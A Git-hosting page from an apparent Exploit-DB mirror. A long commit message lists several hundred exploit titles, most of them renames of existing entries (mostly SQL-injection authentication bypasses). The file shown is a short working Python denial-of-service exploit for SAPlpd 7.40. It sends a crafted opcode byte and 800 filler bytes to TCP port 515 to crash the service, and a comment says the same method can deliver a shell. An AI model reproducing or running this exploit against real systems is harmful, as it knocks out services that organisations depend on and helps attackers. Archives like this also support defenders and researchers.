bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/windows/dos/41030.py
Offensive Security a0c8330781 DB: 2017-01-13 
13 new exploits

SeaMonkey 1.1.14 - (marquee) Denial of Service
SeaMonkey 1.1.14 - Denial of Service

Adobe Flash Player 24.0.0.186 - 'ActionGetURL2' Out-of-Bounds Memory Corruption
Adobe Flash Player 24.0.0.186 - 'ActionGetURL2' Out-of-Bounds Memory Corruption (1)

SapLPD 7.40 - Denial of Service

CoolPlayer 2.19 - (PlaylistSkin) Buffer Overflow
CoolPlayer 2.19 - 'PlaylistSkin' Buffer Overflow

Rosoft media player 4.4.4 - Buffer Overflow (SEH) (2)
Rosoft Media Player 4.4.4 - Buffer Overflow (SEH) (2)

aSc Timetables 2017 - Buffer Overflow

Nginx (Debian-Based Distributions) - 'logrotate' Local Privilege Escalation
Nginx (Debian-Based + Gentoo) - 'logrotate' Local Privilege Escalation

Cemu 1.6.4b - Information Leak + Buffer Overflow (Emulator Breakout)
Cemu 1.6.4b - Information Leak / Buffer Overflow (Emulator Breakout)

PlaySMS 0.7 - SQL Injection
PlaySms 0.7 - SQL Injection

SAP SAPLPD 6.28 - Buffer Overflow (Metasploit)
SapLPD 6.28 - Buffer Overflow (Metasploit)

Microsoft Windows Media Player 7.0 - '.wms' Arbitrary Script (MS00-090)

phpMyFamily 1.4.0 - Authentication Bypass (SQL Injection)
phpMyFamily 1.4.0 - Authentication Bypass

ACNews 1.0 - Admin Authentication Bypass (SQL Injection)
ACNews 1.0 - Authentication Bypass

ASPThai.Net Guestbook 5.5 - (Authentication Bypass) SQL Injection
ASPThai.Net Guestbook 5.5 - Authentication Bypass

PNphpBB2 <= 1.2g - 'phpbb_root_path' Remote File Inclusion
PNphpBB2 <= 1.2g - 'phpbb_root_path' Parameter Remote File Inclusion

cutenews aj-fork 167f - 'cutepath' Parameter Remote File Inclusion
CuteNews aj-fork 167f - 'cutepath' Parameter Remote File Inclusion

WSN Guest 1.21 - (comments.php id) SQL Injection
WSN Guest 1.21 - 'id' Parameter SQL Injection

PNPHPBB2 <= 1.2 - (index.php c) SQL Injection
PNPHPBB2 <= 1.2 - 'index.php' SQL Injection

PNPHPBB2 <= 1.2i - viewforum.php SQL Injection
PNPHPBB2 <= 1.2i - 'viewforum.php' SQL Injection

PNPHPBB2 <= 1.2i - (printview.php PHPEx) Local File Inclusion
PNPHPBB2 <= 1.2i - 'PHPEx' Parameter Local File Inclusion

webClassifieds 2005 - (Authentication Bypass) SQL Injection
webClassifieds 2005 - Authentication Bypass
webSPELL 4.01.02 - 'id' Remote Edit Topics
PNphpBB2 <= 12i - (ModName) Multiple Local File Inclusion
WSN Guest 1.23 - 'Search' SQL Injection
webSPELL 4.01.02 - 'id' Parameter Remote Edit Topics
PNphpBB2 <= 1.2i - (ModName) Multiple Local File Inclusion
WSN Guest 1.23 - 'Search' Parameter SQL Injection

Ayemsis Emlak Pro - (Authentication Bypass) SQL Injection
Ayemsis Emlak Pro - Authentication Bypass
Joomla! Component com_phocadocumentation - 'id' SQL Injection
phpauctionsystem - Cross-Site Scripting / SQL Injection
Joomla! Component com_phocadocumentation - 'id' Parameter SQL Injection
PHPAuctionSystem - Cross-Site Scripting / SQL Injection

RiotPix 0.61 - (forumid) Blind SQL Injection
RiotPix 0.61 - 'forumid' Parameter Blind SQL Injection

RiotPix 0.61 - (Authentication Bypass) SQL Injection
RiotPix 0.61 - Authentication Bypass
playSms 0.9.3 - Multiple Remote / Local File Inclusion
BlogHelper - 'common_db.inc' Remote Config File Disclosure
PollHelper - 'poll.inc' Remote Config File Disclosure
PlaySms 0.9.3 - Multiple Remote / Local File Inclusion
BlogHelper - Remote Config File Disclosure
PollHelper - Remote Config File Disclosure

Fast FAQs System - (Authentication Bypass) SQL Injection
Fast FAQs System - Authentication Bypass

Fast Guest Book - (Authentication Bypass) SQL Injection
Fast Guest Book - Authentication Bypass
BKWorks ProPHP 0.50b1 - (Authentication Bypass) SQL Injection
Weight Loss Recipe Book 3.1 - (Authentication Bypass) SQL Injection
BKWorks ProPHP 0.50b1 - Authentication Bypass
Weight Loss Recipe Book 3.1 - Authentication Bypass
Dark Age CMS 0.2c Beta - (Authentication Bypass) SQL Injection
Syzygy CMS 0.3 - (Authentication Bypass) SQL Injection
Dark Age CMS 0.2c Beta - Authentication Bypass
Syzygy CMS 0.3 - Authentication Bypass
eFAQ - (Authentication Bypass) SQL Injection
eReservations - (Authentication Bypass) SQL Injection
The Walking Club - (Authentication Bypass) SQL Injection
Ping IP - (Authentication Bypass) SQL Injection
eFAQ - Authentication Bypass
eReservations - Authentication Bypass
The Walking Club - Authentication Bypass
Ping IP - Authentication Bypass

ASP ActionCalendar 1.3 - (Authentication Bypass) SQL Injection
ASP ActionCalendar 1.3 - Authentication Bypass

Click&Email - (Authentication Bypass) SQL Injection
Click&Email - Authentication Bypass

Web-Calendar Lite 1.0 - (Authentication Bypass) SQL Injection
Web-Calendar Lite 1.0 - Authentication Bypass

ClickAuction - (Authentication Bypass) SQL Injection
ClickAuction - Authentication Bypass

Netartmedia Car Portal 1.0 - (Authentication Bypass) SQL Injection
Netartmedia Car Portal 1.0 - Authentication Bypass

SalesCart - (Authentication Bypass) SQL Injection
SalesCart - Authentication Bypass
WholeHogSoftware Ware Support - (Authentication Bypass) SQL Injection
WholeHogSoftware Password Protect - (Authentication Bypass) SQL Injection
WholeHogSoftware Ware Support - Authentication Bypass
WholeHogSoftware Password Protect - Authentication Bypass

ClickCart 6.0 - (Authentication Bypass) SQL Injection
ClickCart 6.0 - Authentication Bypass

Online Grades 3.2.4 - (Authentication Bypass) SQL Injection
Online Grades 3.2.4 - Authentication Bypass

MyDesing Sayac 2.0 - (Authentication Bypass) SQL Injection
MyDesing Sayac 2.0 - Authentication Bypass
AuthPhp 1.0 - (Authentication Bypass) SQL Injection
Mynews 0_10 - (Authentication Bypass) SQL Injection
BlueBird Pre-Release - (Authentication Bypass) SQL Injection
AuthPhp 1.0 - Authentication Bypass
Mynews 0_10 - Authentication Bypass
BlueBird Pre-Release - Authentication Bypass

Grestul 1.x - Authentication Bypass (via Cookie SQL Injection)
Grestul 1.x - Authentication Bypass (Cookie SQL Injection)

XGuestBook 2.0 - (Authentication Bypass) SQL Injection
XGuestBook 2.0 - Authentication Bypass

PenPal 2.0 - (Authentication Bypass) SQL Injection
PenPal 2.0 - Authentication Bypass

BannerManager 0.81 - (Authentication Bypass) SQL Injection
BannerManager 0.81 - Authentication Bypass

Free PHP Petition Signing Script - (Authentication Bypass) SQL Injection
Free PHP Petition Signing Script - Authentication Bypass
Simbas CMS 2.0 - (Authentication Bypass) SQL Injection
WebFileExplorer 3.1 - (Authentication Bypass) SQL Injection
Simbas CMS 2.0 - Authentication Bypass
WebFileExplorer 3.1 - Authentication Bypass

My Dealer CMS 2.0 - (Authentication Bypass) SQL Injection
My Dealer CMS 2.0 - Authentication Bypass

XEngineSoft PMS/MGS/NM/Ams 1.0 - (Authentication Bypass) SQL Injection
XEngineSoft PMS/MGS/NM/Ams 1.0 - Authentication Bypass

NetHoteles 2.0/3.0 - (Authentication Bypass) SQL Injection
NetHoteles 2.0/3.0 - Authentication Bypass

Tiny Blogr 1.0.0 rc4 - (Authentication Bypass) SQL Injection
Tiny Blogr 1.0.0 rc4 - Authentication Bypass

ClanTiger 1.1.1 - (Authentication Bypass) SQL Injection
ClanTiger 1.1.1 - Authentication Bypass

Hot Project 7.0 - (Authentication Bypass) SQL Injection
Hot Project 7.0 - Authentication Bypass

EZ Webitor - (Authentication Bypass) SQL Injection
EZ Webitor - Authentication Bypass

Creasito E-Commerce 1.3.16 - (Authentication Bypass) SQL Injection
Creasito E-Commerce 1.3.16 - Authentication Bypass

I-Rater Pro/Plantinum 4.0 - (Authentication Bypass) SQL Injection
I-Rater Pro/Plantinum 4.0 - Authentication Bypass

5 star Rating 1.2 - (Authentication Bypass) SQL Injection
5 star Rating 1.2 - Authentication Bypass

Tiger Dms - (Authentication Bypass) SQL Injection
Tiger Dms - Authentication Bypass
The Recipe Script 5 - (Authentication Bypass) SQL Injection / DB Backup
Realty Web-Base 1.0 - (Authentication Bypass) SQL Injection
Luxbum 0.5.5/stable - (Authentication Bypass) SQL Injection
The Recipe Script 5 - (Authentication Bypass) SQL Injection / Database Backup
Realty Web-Base 1.0 - Authentication Bypass
Luxbum 0.5.5/stable - Authentication Bypass

My Game Script 2.0 - (Authentication Bypass) SQL Injection
My Game Script 2.0 - Authentication Bypass

Submitter Script - (Authentication Bypass) SQL Injection
Submitter Script - Authentication Bypass

PHP Dir Submit - (Authentication Bypass) SQL Injection
PHP Dir Submit - Authentication Bypass

DM FileManager 3.9.2 - (Authentication Bypass) SQL Injection
DM FileManager 3.9.2 - Authentication Bypass

VICIDIAL 2.0.5-173 - (Authentication Bypass) SQL Injection
VICIDIAL 2.0.5-173 - Authentication Bypass

Article Directory - (Authentication Bypass) SQL Injection
Article Directory - Authentication Bypass

phpBugTracker 1.0.3 - (Authentication Bypass) SQL Injection
phpBugTracker 1.0.3 - Authentication Bypass

Zen Help Desk 2.1 - (Authentication Bypass) SQL Injection
Zen Help Desk 2.1 - Authentication Bypass

EgyPlus 7ml 1.0.1 - (Authentication Bypass) SQL Injection
EgyPlus 7ml 1.0.1 - Authentication Bypass

Pixelactivo 3.0 - (Authentication Bypass) SQL Injection
Pixelactivo 3.0 - Authentication Bypass

MyCars Automotive - (Authentication Bypass) SQL Injection
MyCars Automotive - Authentication Bypass

Zip Store Chat 4.0/5.0 - (Authentication Bypass) SQL Injection
Zip Store Chat 4.0/5.0 - Authentication Bypass

AlumniServer 1.0.1 - (Authentication Bypass) SQL Injection
AlumniServer 1.0.1 - Authentication Bypass

ForumPal FE 1.1 - (Authentication Bypass) SQL Injection
ForumPal FE 1.1 - Authentication Bypass

Opial 1.0 - (Authentication Bypass) SQL Injection
Opial 1.0 - Authentication Bypass

webLeague 2.2.0 - (Authentication Bypass) SQL Injection
webLeague 2.2.0 - Authentication Bypass

AnotherPHPBook (APB) 1.3.0 - (Authentication Bypass) SQL Injection
AnotherPHPBook (APB) 1.3.0 - Authentication Bypass

SaphpLesson 4.0 - (Authentication Bypass) SQL Injection
SaphpLesson 4.0 - Authentication Bypass

Limny 1.01 - (Authentication Bypass) SQL Injection
Limny 1.01 - Authentication Bypass

Magician Blog 1.0 - (Authentication Bypass) SQL Injection
Magician Blog 1.0 - Authentication Bypass

AW BannerAd - (Authentication Bypass) SQL Injection
AW BannerAd - Authentication Bypass

Ajax Short URL Script - (Authentication Bypass) SQL Injection
Ajax Short URL Script - Authentication Bypass
TT Web Site Manager 0.5 - (Authentication Bypass) SQL Injection
SimpleLoginSys 0.5 - (Authentication Bypass) SQL Injection
TT Web Site Manager 0.5 - Authentication Bypass
SimpleLoginSys 0.5 - Authentication Bypass

Questions Answered 1.3 - (Authentication Bypass) SQL Injection
Questions Answered 1.3 - Authentication Bypass

Blink Blog System - (Authentication Bypass) SQL Injection
Blink Blog System - Authentication Bypass

MOC Designs PHP News 1.1 - (Authentication Bypass) SQL Injection
MOC Designs PHP News 1.1 - Authentication Bypass

PHotoLa Gallery 1.0 - (Authentication Bypass) SQL Injection
PHotoLa Gallery 1.0 - Authentication Bypass

PHPCityPortal - (Authentication Bypass) SQL Injection
PHPCityPortal - Authentication Bypass

Logoshows BBS 2.0 - (Authentication Bypass) SQL Injection
Logoshows BBS 2.0 - Authentication Bypass

SmilieScript 1.0 - (Authentication Bypass) SQL Injection
SmilieScript 1.0 - Authentication Bypass

humanCMS - (Authentication Bypass) SQL Injection
humanCMS - Authentication Bypass

Three Pillars Help Desk 3.0 - (Authentication Bypass) SQL Injection
Three Pillars Help Desk 3.0 - Authentication Bypass

AdsDX 3.05 - (Authentication Bypass) SQL Injection
AdsDX 3.05 - Authentication Bypass

Nephp Publisher Enterprise 4.5 - (Authentication Bypass) SQL Injection
Nephp Publisher Enterprise 4.5 - Authentication Bypass

W3infotech - (Authentication Bypass) SQL Injection
W3infotech - Authentication Bypass

Real Estate Portal X.0 - (Authentication Bypass) SQL Injection
Real Estate Portal X.0 - Authentication Bypass

PHP Inventory 1.2 - Remote Authentication Bypass (SQL Injection)
PHP Inventory 1.2 - Authentication Bypass

SitePal 1.1 - (Authentication Bypass) SQL Injection
SitePal 1.1 - Authentication Bypass

JM CMS 1.0 <= 1.0 - (Authentication Bypass) SQL Injection
JM CMS 1.0 - Authentication Bypass

Pre Hospital Management System - (Authentication Bypass) SQL Injection
Pre Hospital Management System - Authentication Bypass

Digiappz Freekot - (Authentication Bypass) SQL Injection
Digiappz Freekot - Authentication Bypass

Omnistar Affiliate - (Authentication Bypass) SQL Injection
Omnistar Affiliate - Authentication Bypass

PRE HOTELS&RESORTS MANAGEMENT SYSTEM - (Authentication Bypass) SQL Injection
PRE HOTELS&RESORTS MANAGEMENT SYSTEM - Authentication Bypass

Advance Biz Limited 1.0 - (Authentication Bypass) SQL Injection
Advance Biz Limited 1.0 - Authentication Bypass
e-topbiz banner exchange PHP - (Authentication Bypass) SQL Injection
e-topbiz Slide Popups 1 PHP - (Authentication Bypass) SQL Injection
e-topbiz banner exchange PHP - Authentication Bypass
e-topbiz Slide Popups 1 PHP - Authentication Bypass

Freewebscript'z Games - (Authentication Bypass) SQL Injection
Freewebscript'z Games - Authentication Bypass

DZOIC Handshakes - Authentication Bypass (SQL Injection)
DZOIC Handshakes - Authentication Bypass

DZOIC ClipHouse - Authentication Bypass (SQL Injection)
DZOIC ClipHouse - Authentication Bypass

PHP Car Rental-Script - (Authentication Bypass) SQL Injection
PHP Car Rental-Script - Authentication Bypass
Zen Tracking 2.2 - (Authentication Bypass) SQL Injection
Baal Systems 3.8 - (Authentication Bypass) SQL Injection
Zen Tracking 2.2 - Authentication Bypass
Baal Systems 3.8 - Authentication Bypass

Killmonster 2.1 - (Authentication Bypass) SQL Injection
Killmonster 2.1 - Authentication Bypass

Rostermain 1.1 - (Authentication Bypass) SQL Injection
Rostermain 1.1 - Authentication Bypass

NewsLetter Tailor - (Authentication Bypass) SQL Injection
NewsLetter Tailor - Authentication Bypass

WSN Guest 1.02 - (orderlinks) SQL Injection
WSN Guest 1.02 - 'orderlinks' Parameter SQL Injection

Project Man 1.0 - (Authentication Bypass) SQL Injection
Project Man 1.0 - Authentication Bypass

Uiga Fan Club 1.0 - (Authentication Bypass) SQL Injection
Uiga Fan Club 1.0 - Authentication Bypass

HazelPress Lite 0.0.4 - (Authentication Bypass) SQL Injection
HazelPress Lite 0.0.4 - Authentication Bypass

Majoda CMS - (Authentication Bypass) SQL Injection
Majoda CMS - Authentication Bypass

4x CMS r26 - (Authentication Bypass) SQL Injection
4x CMS r26 - Authentication Bypass
Satellite-X 4.0 - (Authentication Bypass) SQL Injection
Huron CMS 8 11 2007 - (Authentication Bypass) SQL Injection
Satellite-X 4.0 - Authentication Bypass
Huron CMS 8 11 2007 - Authentication Bypass

Zyke CMS 1.1 - (Authentication Bypass) SQL Injection
Zyke CMS 1.1 - Authentication Bypass

Online University - (Authentication Bypass) SQL Injection
Online University - Authentication Bypass

Online Job Board - (Authentication Bypass) SQL Injection
Online Job Board - Authentication Bypass

JE CMS 1.0.0 - Authentication Bypass (via SQL Injection)
JE CMS 1.0.0 - Authentication Bypass

ExtCalendar2 - (Authentication Bypass/Cookie) SQL Injection
ExtCalendar2 - (Authentication Bypass / Cookie) SQL Injection

SN News 1.2 - '/admin/loger.php' Authentication Bypass (SQL Injection)
SN News 1.2 - '/admin/loger.php' Authentication Bypass

RTTucson Quotations Database Script - (Authentication Bypass) SQL Injection
RTTucson Quotations Database Script - Authentication Bypass

PlaySms - 'index.php' Cross-Site Scripting
PlaySms 0.8 - 'index.php' Cross-Site Scripting

Practico CMS 13.7 - Authentication Bypass (SQL Injection)
Practico CMS 13.7 - Authentication Bypass

Airbnb Clone Script - Arbitrary File Upload

Milw0rm Clone Script 1.0 - (Authentication Bypass) SQL Injection
Milw0rm Clone Script 1.0 - Authentication Bypass

PHPCollab CMS 2.5 - (emailusers.php) SQL Injection
PHPCollab CMS 2.5 - 'emailusers.php' SQL Injection

My link trader 1.1 - 'id' Parameter SQL Injection
My Link Trader 1.1 - 'id' Parameter SQL Injection
b2evolution 6.8.2 - Arbitrary File Upload
Job Portal Script 9.11 - Authentication Bypass
Online Food Delivery 2.04 - Authentication Bypass
iTechscripts Freelancer Script 5.11 - 'sk' Parameter SQL Injection
D-Link DIR-615 - Multiple Vulnerabilities
School Management Software 2.75 - SQL Injection
Penny Auction Script - Arbitrary File Upload
ECommerce-TIBSECART - Arbitrary File Upload
ECommerce-Multi-Vendor Software - Arbitrary File Upload
2017-01-13 05:01:18 +00:00

24 lines
No EOL
740 B
Python
Executable file
Raw Blame History

# Exploit Title: SAPlpd 7.40 Denial of Service
# Date: 2016-12-28
# Exploit Author: Peter Baris
# Exploit code: http://saptech-erp.com.au/resources/saplpd_dos.zip
# Version: 7.40 all patch levels (as a part of SAPGui 7.40)
# Tested on: Windows Server 2008 R2 x64, Windows 7 Pro x64
import socket
# Opcodes 03h and 04h are vulnerable to bad characters 00h and 0ah
# So you can modify the DoS accordingly
# The added 800 A's are just to show, that you can deliver a complete shell with the command
DoS = ("\x03"+"\x0a"+"\x41"*800)
s = socket.socket()
s.settimeout(1)
s.connect(('192.168.198.132', 515))
print("[*] Crashing SAPlpd 7.40")
print("[*] Payload length: "+str(len(DoS))+" bytes")
s.send(DoS)
s.close()
Reference in a new issue View git blame Copy permalink